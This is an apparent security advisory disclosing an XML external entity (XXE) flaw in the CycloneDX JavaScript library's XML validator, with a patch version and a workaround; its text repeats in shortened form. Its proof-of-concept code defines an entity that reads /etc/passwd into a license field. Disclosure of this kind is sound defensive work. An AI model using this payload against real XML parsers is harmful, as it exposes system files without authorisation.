Impact
XML External entity injections could be possible, when running the provided XML Validator on arbitrary input.
POC
const {
Spec: { Version },
Validation: { XmlValidator }
} = require('@cyclonedx/cyclonedx-library');
const version = Version.v1dot5;
const validator = new XmlValidator(version);
const input = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poc [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5">
<components>
<component type="library">
<name>testing</name>
<version>1.337</version>
<licenses>
<license>
<id>&xxe;</id><!-- << XML external entity (XXE) injection -->
</license>
</licenses>
</component>
</components>
</bom>`;
// validating this forged(^) input might lead to unintended behaviour
// for the fact that the XML external entity would be taken into account.
validator.validate(input).then(ve => {
console.error('validation error', ve);
});
Patches
This issue was fixed in @cyclonedx/cyclonedx-library@6.7.1
.
Workarounds
Do not run the provided XML validator on untrusted inputs.
References
References
Impact
XML External entity injections could be possible, when running the provided XML Validator on arbitrary input.
POC
Patches
This issue was fixed in
@cyclonedx/cyclonedx-library@6.7.1
.Workarounds
Do not run the provided XML validator on untrusted inputs.
References
References